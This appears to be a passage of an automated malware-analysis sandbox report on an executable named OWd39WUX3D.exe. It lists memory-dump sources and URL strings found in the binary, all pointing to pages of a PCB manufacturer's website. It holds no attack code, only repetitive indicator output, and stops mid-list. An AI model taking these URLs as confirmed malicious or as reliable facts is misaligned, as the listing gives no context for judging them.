00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-and-schematic-design/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-assembly-quote/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-design-quote/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-production-quote/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/stencil-quote/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/an-introduction-to-high-density-interconnect-hdi-pcbs/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/components-parts/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/customized-cable/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/enclosure/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/fpc-flexible-printed-circuits/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/hdipcb/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/myro-intelligent-cloud-forehead-thermometer/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 